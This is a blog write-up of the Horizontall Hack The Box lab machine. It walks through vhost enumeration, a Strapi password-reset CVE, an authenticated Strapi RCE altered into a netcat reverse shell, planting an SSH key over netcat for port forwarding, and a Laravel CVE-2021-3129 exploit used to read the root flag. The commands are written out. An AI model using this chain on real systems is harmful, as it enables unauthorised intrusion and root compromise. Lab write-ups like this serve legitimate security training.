Open in app

Sign in

Write

Sign in

Andrea
5 min readSep 9, 2021

Horizontall HTB Machine Write up

Hi everyone!

In this article i’ll cover the Horizontall HTB machine rated Easy/Medium.

The main topic we’ll focus on are: Enumeration, CVE’s, RCE, Port Forwarding, Privilege Escalation.

Alright, let’s start!

https://app.hackthebox.eu/machines/Horizontall

Enumeration

Let’s start with an Nmap scan using the following flags:

  • sV (Identifies the version)
  • sC (Default script)
  • A (Aggressive mode)
  • o (To output the result on a file)
  • vv (Verbose output)

Port 22:

Classic SSH port used to connect to the machine, there is nothing interesting here for now and we still don’t have any credential.

Port 80:

The first thing we see it’s that it requires ‘horizontall.htb’ to be added in our /etc/hosts file; let’s do it using nano or your favourite text editor.

nano /etc/hosts

Next, the index of the page will load and we’ll see a static page with no interaction at all on it; there’s nothing we can click on, so, let’s start a directory bruteforcing.

Gobuster

I’ll use gobuster to cover this section but u can also use other tools.

Bruteforcing directories will lead nowhere, but, bruteforcing vhosts after some minutes will show us something interesting…

gobuster vhost -u http://horizontall.htb -w <Wordlist>

Let’s add him too to our ‘hosts’ file with nano.

Visiting http://api-prod.horizontall.htb will show us a blank white page and a “Welcome” message.

Let’s use again gobuster to bruteforce directories here.

gobuster dir -u http://api-prod.horizontall.htb/ -w <Wordlist>

This gives us 3 entries:

/admin (Login page but we need credentials.)

/reviews (Shows us some reviews and some usernames.)

/users (403 Forbidden)

On /admin endpoint we see the server is running Strapi, which is an Headless Node.js CMS.

Googling around we see that at /admin/strapiVersion we can see its version.

strapiVersion “3.0.0-beta.17.4”

Googling more we can found a CVE that let us reset the password for a specific account.

Exploiting CVE-2019–18818

Let’s download it locally and have a closer look at his code.

It requires us to modify some parameters to make it work correctly.

Let’s do it.

I changed the email to a known admin email, the strapiUrl to the target and a random password (in this case i chosed to use admin).

Using admin:admin to login it finally redirects us to the Strapi dashboard.

Googling for more exploits on this version of Strapi we see that there is an RCE (Authenticated) exploit.

Let’s take a look at it.

Offensive Security's Exploit Database Archive

Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated). CVE-2019-19609 . webapps exploit for Multiple…

www.exploit-db.com

I had some troubles with this script so i slighty modified it, into this:

I changed the context of postData (plugin) with a netcat reverse shell and commented out the os.system command.

Now, before running it, let’s start a netcat listener on port 8080.

nc -nvlp 8080

The syntax for the script is:

python3 50238 http://<TARGET>:<PORT> <JWT_TOKEN> <COMMAND ><LHOST>

We can find the JWT (Json Web Token) in our session storage (cookies) after we log in.

Running it, with no command, will spawn us a shell on the netcat tab.

And we are Strapi User.

Privilege Escalation

First of all, let’s stabilize the shell with python and export TERM variable to have the “clear” command and some text highlighting.

python -c ‘import pty;pty.spawn(“/bin/bash”)’

export TERM=xterm-256color

Next, we run LinPeas to see if it finds some PE vectors.

It will come back with some things:

Password for “developer” user, used to login into mysql.

Writable path on /opt/strapi.

Suspicious service running on port 8000.

The password is not that useful so we will just check what’s on port 8000.

curl -X GET -vv http://localhost:8000

At the end of the response we see that this is a webserver running Laravel v8.

Let’s port forward this locally.

Port Forwarding

Let’s port forward this service using ssh (you could have used chisel too!)

On attacker machine:

ssh-keygen

nc -nvlp 6060 < “PATH-OF-YOUR-ID_RSA.PUB-HERE”

On victim machine:

cd /opt/strapi (Since we have write permissions!!)

mkdir .ssh

cd .ssh

nc -nv <YOUR_IP> > authorized_keys

Now let’s connect to ssh using port forward for port 8000:

On attacker machine:

ssh -i .ssh/id_rsa -L 8000:127.0.0.1:8000 strapi@localhost:8000

Now, vising 127.0.0.1:8000 will show us the default Laravel page.

Let’s search up some exploits for this Laravel version.

Laravel <= v8.4.2 debug mode: Remote code execution

In late November of 2020, during a security audit for one of our clients, we came accross a website based on Laravel…

www.ambionics.io

Let’s search this CVE on github and chose an exploit.

GitHub - nth347/CVE-2021-3129_exploit: Exploit for CVE-2021-3129

Exploit for CVE-2021-3129. Contribute to nth347/CVE-2021-3129_exploit development by creating an account on GitHub.

github.comL

Let’s look at its instructions and build the command.

$ git clone https://github.com/nth347/CVE-2021-3129_exploit.git
$ cd CVE-2021-3129_exploit
$ chmod +x exploit.py
$ ./exploit.py http://localhost:8000 Monolog/RCE1 id

Now, let’s run it.

./exploit.py http://localhost:8000 Monolog/RCE1 id

It works and now we can use it to read the root flag!

./exploit.py http://localhost:8000 Monolog/RCE1 “cat /root/root.txt”

And we are done!

Thanks for reading this article and happy hacking!

Hackthebox
Port Forwarding
Rce
Vhost
Privilege Escalation
Andrea
Andrea

Written by Andrea

1 Follower
1 Following

Hi everyone! I'm a 20 years old cybersecurity enthusiast, here i will post the writeups for some of the machine i like!

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams